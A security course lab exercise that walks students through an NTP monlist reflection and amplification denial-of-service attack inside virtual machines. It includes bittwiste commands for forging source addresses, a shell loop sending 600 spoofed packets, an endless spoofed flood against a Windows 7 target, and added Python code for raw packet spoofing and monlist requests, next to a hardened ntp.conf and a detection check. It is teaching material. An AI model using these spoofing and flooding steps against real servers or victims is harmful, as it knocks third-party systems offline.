Proj 6x: Packet Amplification with NTP (20 pts. extra credit)

What you need

Purpose

NTP runs over UDP, so a request can carry a forged source address and the server will answer whoever that address belongs to. Servers that still honor the legacy mode 7 "monlist" query answer a tiny request with a reply many times larger, which lets attackers use them to reflect and amplify DoS traffic.

This project demonstrates the attack.

Enabling NTP on your Kali Linux NTP Server

On the Kali Linux machine you have chosen to use as the NTP Server, in a Terminal window, execute these commands:
apt-get update
apt-get install ntp ntpdate -y 
service ntp start
netstat -an | more
You should see a line like this, indicating that the server is listening on UDP port 123, as shown below.
udp       0       0 0.0.0.0:123       0.0.0.0:*

Testing NTP from your Kali Linux Attacker

On your other Kali Linux machine, which you are using as the Attacker, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali NTP server:
apt-get update
apt-get install ntpdate -y 
ntpdate -d 192.168.119.243
You should see four "transmit" messages and four "receive" messages, followed by a lot of timestamp values, as shown below.

This shows that your NTP server is operating correctly, allowing another machine to synchronize its clock from it.

Attempting a monlist Query from your Kali Linux Attacker

On your Kali Linux Attacker machine, execute this command, replacing the IP address with the IP address of your Kali NTP server:
ntpdc -n -c monlist 192.168.119.243
You should see a "***Request timed out" message, as shown below.

This is because the default "restrict" lines in /etc/ntp.conf carry the noquery flag, so the server drops ntpdc and ntpq queries such as monlist from any address other than localhost. The request is simply never answered, which is why ntpdc reports a timeout rather than an error.

Adjusting the NTP Configuration to Trust Everyone

This is one way to make your NTP server vulnerable: remove the default restrictions so that everyone may use every operation.

Obviously this is a terrible idea, but there are thousands of NTP servers running right now that allow the dangerous monlist operation from everyone.

On your Kali Linux NTP Server, in a Terminal window, execute these commands:

cp /etc/ntp.conf /etc/ntp.conf.orig

nano /etc/ntp.conf

In nano, scroll down a page or two to find the two "restrict ... default" lines highlighted below (the ones ending in noquery), and add # signs at the start of each to comment them out:

Save the file with Ctrl+X, Y, Enter.

With no default restrict line, the server applies no restriction to any address: any client can send any query, including monlist, without authentication.

On your Kali Linux NTP Server, in a Terminal window, execute this command:

service ntp restart
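For reference, here is the weak configuration this step produces next to the hardened form. This is an added example, not the page's own file; the lines are the ones Debian's ntp package ships in /etc/ntp.conf and are assumed to match yours (if your file differs, the point is the noquery flag on the default restrict lines). The lasting fix is an ntpd from 4.2.7p26 onward, which no longer answers monlist at all.

```conf
# VULNERABLE (what this project sets up): the default restrict lines are
# commented out, so no restriction applies to any address and monlist answers.
#restrict -4 default kod notrap nomodify nopeer noquery
#restrict -6 default kod notrap nomodify nopeer noquery
restrict 127.0.0.1
restrict ::1

# HARDENED: restore the shipped defaults. noquery makes ntpd drop mode 6/7
# queries (ntpq/ntpdc, including monlist) from everyone except localhost,
# while ordinary time requests are still served.
restrict -4 default kod notrap nomodify nopeer noquery
restrict -6 default kod notrap nomodify nopeer noquery
restrict 127.0.0.1
restrict ::1

# Belt and braces: stop keeping the recent-clients (MRU) list at all, so
# even a permitted monlist query has nothing to return.
disable monitor
```

After editing, restart the service and repeat the ntpdc monlist query from the attacker: the hardened file should bring back the "***Request timed out" result while ntpdate still synchronizes.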

Performing a monlist Query from your Kali Linux Attacker

On your Kali Linux Attacker machine, execute this command, replacing the IP address with the IP address of your Kali NTP server:
ntpdate -d 192.168.119.243

ntpdc -n -c monlist 192.168.119.243

You should see a reply listing the clients that have recently used the NTP server (at this point just your attacker machine), as shown below.

This is the essential vulnerability we will exploit: a small request gets a large response, and because UDP needs no handshake the request's source address can be forged so the response goes to a victim instead of the sender.

Filling the Client List

A real NTP server will have a list of hundreds of clients, because many machines use it. In our test situation, we'll have to send false update requests to simulate that situation.

Capturing an NTP Client Packet

On your Kali Linux Attacker machine, in a Terminal window, execute this command:
wireshark
Start Wireshark listening on your eth0 interface. In the Filter box, type ntp and press Enter.

On your Kali Linux Attacker machine, open a new Terminal window and execute this command, replacing the IP address with the IP address of your Kali NTP server:

ntpdate -p 1 -d 192.168.119.243
In Wireshark, you should see one "NTP Version 4, client" message and one "NTP Version 4, server" message as shown below.

Saving the NTP Client Packet

On your Kali Linux Attacker machine, click the "NTP Version 4, client" packet so it is highlighted in the top pane of Wireshark, as shown above.

From the Wireshark menu bar, click File, "Export Specified Packets...".

In the "Wireshark: Export Specified Packets" box, at the top, enter a name of "NTP-Client-YOURNAME.pcap".

On the "Save in folder:" line, click Desktop.

In the lower left, click the "Selected packet only" button.

Select a "File type" of "Wireshark/tcpdump/... - libpcap", as shown below.

Click Save.

On your Kali Linux Attacker machine, close Wireshark.

Getting Bit-twist

You may have already done this in a previous project. If not, do the steps below.

On your Kali Linux Attacker machine, open a Web browser and go to

http://bittwist.sourceforge.net/

Download the Linux version and save it on your Kali desktop.

On your Kali Linux Attacker machine, in a Terminal window, execute these commands:

Note: when I installed libpcap-dev, I got an error processing "xplico" but it seems to be OK to just ignore that.

apt-get install libpcap-dev -y
cd 
cd Desktop
tar xzf bittwist-linux-2.0.tar.gz
cd bittwist-linux-2.0
make
make install

Editing the NTP Client Packet

Using bittwiste, we will change the source IP address of the captured NTP client packet to a different IP address.

Bittwiste recomputes the affected checksums automatically: the IP header checksum, and the UDP checksum, which covers the source address through its pseudo-header. Without that step the edited packet would be discarded by the receiving host.

On your Kali Linux Attacker machine, in a Terminal window, execute this command:

cd
cd Desktop
bittwiste -I NTP-Client-YOURNAME.pcap -O NTP-Client2-YOURNAME.pcap -T ip -s 1.2.3.4
When the command succeeds, you should see the message "1 packets (87 bytes) written", as shown below.

Sending the Modified Packet

On your Kali Linux Attacker machine, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali NTP Server:
bittwist -i eth0 NTP-Client2-YOURNAME.pcap -l 1
ntpdc -n -c monlist 192.168.119.243
You should see a list of addresses, now including the fake address "1.2.3.4", as shown below.

(You may also see a few other addresses: the upstream NTP servers that your Kali NTP server itself synchronizes with.)

Making a Script to send 600 Modified Packets

On your Kali Linux Attacker machine, in a Terminal window, execute these commands:
cd
cd Desktop
nano 600ntp
In nano, enter this script, replacing YOURNAME as before, as shown below:
#!/bin/bash
# Send 600 copies of the captured NTP client packet, each with a different
# spoofed source address (2.2.1.1 through 2.2.60.10), so the server's
# recent-clients list fills up. rm -f keeps the loop going on the first pass,
# when the output file does not exist yet.
for i in {1..60}; do
  for j in {1..10}; do
    rm -f NTP-Client2-YOURNAME.pcap
    bittwiste -I NTP-Client-YOURNAME.pcap -O NTP-Client2-YOURNAME.pcap -T ip -s 2.2.$i.$j
    bittwist -i eth0 NTP-Client2-YOURNAME.pcap -l 1
  done
done

Save the file with Ctrl+X, Y, Enter.

Running the Script

On your Kali Linux Attacker machine, in a Terminal window, execute this command:
bash 600ntp
You see a lot of messages, as the pcap file is repeatedly edited and transmitted, as shown below.
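The following Python script is an added example, not code from the page or from the bittwist project. It does in code what the bittwiste/bittwist steps above do: it builds an NTPv4 client packet like the one ntpdate sends, rewrites the IPv4 source address, recomputes the IP header and UDP checksums (the part bittwiste does for you), and produces the same 600 spoofed sources as the 600ntp script. The frame, MAC addresses and client address are constructed placeholders; only send_frame touches the network, and it is not called by default.

```python
#!/usr/bin/env python3
"""Added example: source-address rewriting with checksum repair,
equivalent to `bittwiste -T ip -s NEW_SRC` followed by `bittwist -i eth0`.
Everything below is constructed for illustration; nothing is sent unless
you call send_frame() yourself (needs root, Linux AF_PACKET)."""
import socket
import struct
from ipaddress import IPv4Address

ETH_LEN = 14          # Ethernet header; IPv4 header follows at offset 14
IP_SRC_OFF = ETH_LEN + 12   # IPv4 source address sits 12 bytes into the header


def inet_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (used by IPv4 and UDP)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def fix_checksums(frame):
    """Recompute the IPv4 header checksum and the UDP checksum of an
    Ethernet/IPv4/UDP frame. The UDP checksum covers a pseudo-header with the
    IP addresses, so changing the source address invalidates it too."""
    ihl = (frame[ETH_LEN] & 0x0F) * 4
    ip = bytearray(frame[ETH_LEN:ETH_LEN + ihl])
    ip[10:12] = b"\x00\x00"
    ip[10:12] = struct.pack("!H", inet_checksum(bytes(ip)))
    udp = bytearray(frame[ETH_LEN + ihl:])
    udp[6:8] = b"\x00\x00"
    pseudo = bytes(ip[12:20]) + struct.pack("!BBH", 0, 17, len(udp))
    csum = inet_checksum(pseudo + bytes(udp))
    udp[6:8] = struct.pack("!H", csum or 0xFFFF)   # 0 would mean "no checksum"
    return bytes(frame[:ETH_LEN]) + bytes(ip) + bytes(udp)


def build_ntp_client_packet(src_ip, dst_ip, src_port=123):
    """Constructed frame: Ethernet + IPv4 + UDP + 48-byte NTPv4 client request
    (LI=0, VN=4, Mode=3, like ntpdate). MACs are placeholders."""
    ntp = bytes([0x23]) + b"\x00" * 47
    udp_len = 8 + len(ntp)
    udp = struct.pack("!HHHH", src_port, 123, udp_len, 0) + ntp
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + udp_len, 0x1234, 0x4000,
                     64, 17, 0, IPv4Address(src_ip).packed, IPv4Address(dst_ip).packed)
    eth = b"\x00\x0c\x29\x00\x00\x01" + b"\x00\x0c\x29\x00\x00\x02" + b"\x08\x00"
    return fix_checksums(eth + ip + udp)


def rewrite_source(frame, new_src):
    """bittwiste -T ip -s NEW_SRC: swap the IPv4 source, then repair checksums."""
    f = bytearray(frame)
    f[IP_SRC_OFF:IP_SRC_OFF + 4] = IPv4Address(new_src).packed
    return fix_checksums(bytes(f))


def source_ip(frame):
    return str(IPv4Address(frame[IP_SRC_OFF:IP_SRC_OFF + 4]))


def verify(frame):
    """True when both checksums validate: summing a header over its own
    checksum field yields zero."""
    ihl = (frame[ETH_LEN] & 0x0F) * 4
    ip = frame[ETH_LEN:ETH_LEN + ihl]
    udp = frame[ETH_LEN + ihl:]
    pseudo = ip[12:20] + struct.pack("!BBH", 0, 17, len(udp))
    return inet_checksum(ip) == 0 and inet_checksum(pseudo + udp) == 0


def spoofed_client_frames(base_frame, count=600):
    """The 600ntp loop: one copy of the client packet per source 2.2.i.j."""
    return [rewrite_source(base_frame, "2.2.%d.%d" % (n // 10 + 1, n % 10 + 1))
            for n in range(count)]


def send_frame(frame, iface="eth0"):
    """Transmit one raw frame on iface, as `bittwist -i eth0 file.pcap -l 1` does."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    base = build_ntp_client_packet("192.168.119.5", "192.168.119.243")
    frames = spoofed_client_frames(base)
    print(len(frames), "frames, first source", source_ip(frames[0]),
          "last source", source_ip(frames[-1]), "checksums ok:", all(map(verify, frames)))
```

The verify function is also the check to run if a spoofed packet never shows up in monlist: a frame whose source was patched without recomputing the checksums fails it, and the NTP server's kernel drops such packets before ntpd ever sees them.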

Performing a monlist Query from your Kali Linux Attacker

On your Kali Linux Attacker machine, execute this command, replacing the IP address with the IP address of your Kali NTP server:
ntpdc -n -c monlist 192.168.119.243
You may have to repeat the command twice, but when it works, you should see a long list of addresses starting with "2.2", as shown below.

Saving a Screen Image

Make sure your screen shows a lot of addresses starting with "2.2".

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 6xa". Use your real name, not the literal text "Your Name".

Measuring the Packet Amplification Factor

On your Kali Linux Attacker machine, start Wireshark sniffing on your network adapter.

On your Kali Linux Attacker machine, execute this command, replacing the IP address with the IP address of your Kali NTP server:

ntpdc -n -c monlist 192.168.119.243
In Wireshark, stop the capture.

You should see a single packet sent to the server, with a long list of reply packets.

Right-click one of the NTP packets and click "Follow UDP Stream", as shown below.

In the "Follow UDP Stream" box, at the bottom, click the double-arrow to the right of the "Entire conversation" message.

The sizes of the request and response streams are shown. When I did it, the request was 192 bytes and the response was 43,560 bytes, as shown below.

That's an amplification of 43,560 / 192 = 226.9x!

Each monlist reply packet is 440 bytes (an 8-byte mode 7 header plus six 72-byte client entries), so 43,560 bytes is 99 full reply packets in answer to one query. The server sends up to 100 such packets, one per six entries, for a list of 600 clients.
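The following Python module is an added example, not code from the page or from the ntp project. It serves two passages: the monlist query above (what the 8-byte mode 7 request that ntpdc sends actually contains) and this measurement (why the reply comes back as a stream of 440-byte packets). It builds the request, parses mode 7 reply packets into client entries, flags monlist requests in captured UDP payloads as a detection check, and computes the amplification factor. The reply packets it parses are constructed here to mimic a server whose list holds 600 clients; no traffic is sent.

```python
#!/usr/bin/env python3
"""Added example: NTP mode 7 "monlist" request, reply parsing and the
amplification arithmetic. Sample replies are constructed, nothing is sent."""
import struct
from ipaddress import IPv4Address

IMPL_XNTPD = 3            # implementation number ntpdc puts in byte 2
REQ_MON_GETLIST_1 = 42    # request code for monlist (MON_GETLIST_1)
MONLIST_ENTRY_LEN = 72    # size of one info_monitor_1 entry in the reply
ENTRIES_PER_PACKET = 6    # 6 * 72 = 432 bytes fits the 500-byte data area
MAX_MONLIST_ENTRIES = 600 # ntpd returns at most 600 recent clients
HDR = "!BBBBHH"           # mode 7 header: 8 bytes


def build_monlist_request(padded=False):
    """Byte 0 = 0x17: response=0, more=0, version 2, mode 7. Byte 1: no auth,
    sequence 0. The 8-byte form is what scanners send; ntpdc pads its
    unauthenticated requests to 48 bytes with a zeroed data area."""
    hdr = struct.pack(HDR, 0x17, 0x00, IMPL_XNTPD, REQ_MON_GETLIST_1,
                      0x0000,    # err (4 bits) | number of items (12 bits)
                      0x0000)    # mbz (4 bits) | item size (12 bits)
    return hdr + (b"\x00" * 40 if padded else b"")


def is_monlist_request(udp_payload):
    """Detection check for a UDP/123 payload: mode 7, impl 3, code 42."""
    return (len(udp_payload) >= 8 and udp_payload[0] & 0x07 == 7
            and udp_payload[2] == IMPL_XNTPD
            and udp_payload[3] == REQ_MON_GETLIST_1)


def parse_mode7_response(pkt):
    """Return (header dict, list of client entries) for one reply packet."""
    b0, auth_seq, impl, reqcode, err_nitems, mbz_size = struct.unpack(HDR, pkt[:8])
    hdr = {"response": bool(b0 & 0x80), "more": bool(b0 & 0x40),
           "version": (b0 >> 3) & 0x07, "mode": b0 & 0x07,
           "sequence": auth_seq & 0x7F, "implementation": impl,
           "reqcode": reqcode, "err": err_nitems >> 12,
           "nitems": err_nitems & 0x0FFF, "item_size": mbz_size & 0x0FFF}
    entries, body = [], pkt[8:]
    for i in range(hdr["nitems"]):
        e = body[i * hdr["item_size"]:(i + 1) * hdr["item_size"]]
        # avg_int, last_int, restr, count, addr, daddr, flags, port, mode, version
        _, _, _, count, addr, _, _, port, mode, ver = struct.unpack("!IIIIIIIHBB", e[:32])
        entries.append({"addr": str(IPv4Address(addr)), "count": count,
                        "port": port, "mode": mode, "version": ver})
    return hdr, entries


def build_monlist_reply(clients, sequence=0, more=False):
    """Constructed server reply carrying up to six (ip, count) entries."""
    b0 = 0x80 | (0x40 if more else 0) | (2 << 3) | 7
    hdr = struct.pack(HDR, b0, sequence & 0x7F, IMPL_XNTPD, REQ_MON_GETLIST_1,
                      len(clients), MONLIST_ENTRY_LEN)
    body = b""
    for ip, count in clients:
        body += struct.pack("!IIIIIIIHBB", 1, 0, 0, count,
                            int(IPv4Address(ip)), 0, 0, 123, 3, 4)
        body += b"\x00" * (MONLIST_ENTRY_LEN - 32)   # v6 fields, unused here
    return hdr + body


def monlist_reply_stream(n_clients):
    """All reply packets for a list of n_clients (capped at 600), with the
    'more' bit set on every packet but the last. Client addresses are the
    2.2.i.j spoofed sources the project's 600ntp script generates."""
    n = min(n_clients, MAX_MONLIST_ENTRIES)
    clients = [("2.2.%d.%d" % (i // 10 + 1, i % 10 + 1), 1) for i in range(n)]
    pkts = []
    for seq, start in enumerate(range(0, n, ENTRIES_PER_PACKET)):
        chunk = clients[start:start + ENTRIES_PER_PACKET]
        pkts.append(build_monlist_reply(chunk, seq, more=start + ENTRIES_PER_PACKET < n))
    return pkts


def amplification(request, replies):
    """UDP-payload amplification factor: total reply bytes / request bytes."""
    return sum(len(p) for p in replies) / len(request)


if __name__ == "__main__":
    req = build_monlist_request(padded=True)
    pkts = monlist_reply_stream(600)
    hdr, entries = parse_mode7_response(pkts[0])
    print(len(pkts), "packets of", len(pkts[0]), "bytes; first entry", entries[0]["addr"])
    print("amplification for a 48-byte request: %.1fx" % amplification(req, pkts))
```

Measured at the payload level a single 48-byte ntpdc request yields 44,000 bytes for a full list, and the 8-byte form scanners use yields the same reply for even less, which is why the factor quoted in the literature is far above the 226.9x seen in the Wireshark stream above (that stream counts ntpdc's retransmissions in the request size).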

Saving a Screen Image

Make sure your screen shows the sizes of the two UDP streams, as shown above, and that the second stream is much larger than the first one--more than 100 times larger.

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 6xb". Use your real name, not the literal text "Your Name".

Saving the NTP Monlist Request Packet

In the "Follow UDP Stream" box, at the bottom, click Close.

In Wireshark, in the top pane, make sure the first UDP packet is highlighted, the one sent to your NTP server, as shown below.

From the Wireshark menu bar, click File, "Export Specified Packets...".

In the "Wireshark: Export Specified Packets" box, at the top, enter a name of "NTP-Monlist-YOURNAME.pcap".

On the "Save in folder:" line, click Desktop.

In the lower left, click the "Selected packet only" button.

Select a "File type" of "Wireshark/tcpdump/... - libpcap", as shown below.

Click Save.

On your Kali Linux Attacker machine, close Wireshark.

Find the Target IP Address

On your Windows 7 target machine, open a Command prompt and execute the IPCONFIG command to find its IP address.

Monitoring the CPU on the Target

On your Windows 7 target machine, right-click the Taskbar (at the bottom of the desktop) and click "Start Task Manager".

Click the Performance tab. You should see 0% CPU usage, or close to it, as shown below:

Leave Task Manager running.

Editing the NTP Monlist Request Packet

Using bittwiste, we will change the source IP address of the NTP monlist request packet to the Target Windows 7 machine's IP address.

On your Kali Linux Attacker machine, in a Terminal window, execute this command, replacing the IP address with your Windows 7 target machine's IP address:

cd
cd Desktop
bittwiste -I NTP-Monlist-YOURNAME.pcap -O NTP-Attack-YOURNAME.pcap -T ip -s 192.168.191.129
When the command succeeds, you should see the message "1 packets (234 bytes) written".

Attacking the Target Windows 7 Machine

On your Kali Linux Attacker machine, in a Terminal window, execute this command:
bittwist -i eth0 NTP-Attack-YOURNAME.pcap -l 0
With -l 0, bittwist loops until you stop it, sending an endless flood of monlist requests to the Kali Linux NTP Server with the target's address as the source. The server reflects and amplifies them, sending the large monlist replies to the Windows 7 target.

You should see the target's CPU usage climb. On my system I was easily able to push the target to 100% CPU, as shown below.

On your Kali Linux Attacker machine, press Ctrl+C to stop the attack.

Saving a Screen Image

Make sure your screen shows the CPU graph rising from near-zero to some larger sustained value.

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 6xc". Use your real name, not the literal text "Your Name".

Turning in your Project

Email the images as attachments to an e-mail message.

Send it to: cnit.124@gmail.com with a subject line of "Proj 6x From Your Name", replacing "Your Name" with your own first and last name.

Send a Cc to yourself.

Sources

Analysis of SNMP/NTP/CHARGEN DrDOS Attacks Prolexic, 2013

SNMP Reflected Denial of Service

NTP BASED DDOS ATTACK – UNDERSTANDING NTP REFLECTION (2014)

How-to : Adding SNMP to Windows Server 2008 R2

Duplicate network traffic from guest

Duplicate ping response when running Ubuntu as virtual machine (VMWare)

Windows 7 manual configuration for L2TP/IPSec VPN clients

How to Setup a Windows 2008 R2 SNTP/NTP Server

Windows Time Service Tools and Settings

Using NTP to sync time on Debian


Last Modified: 5-10-14 11:50 am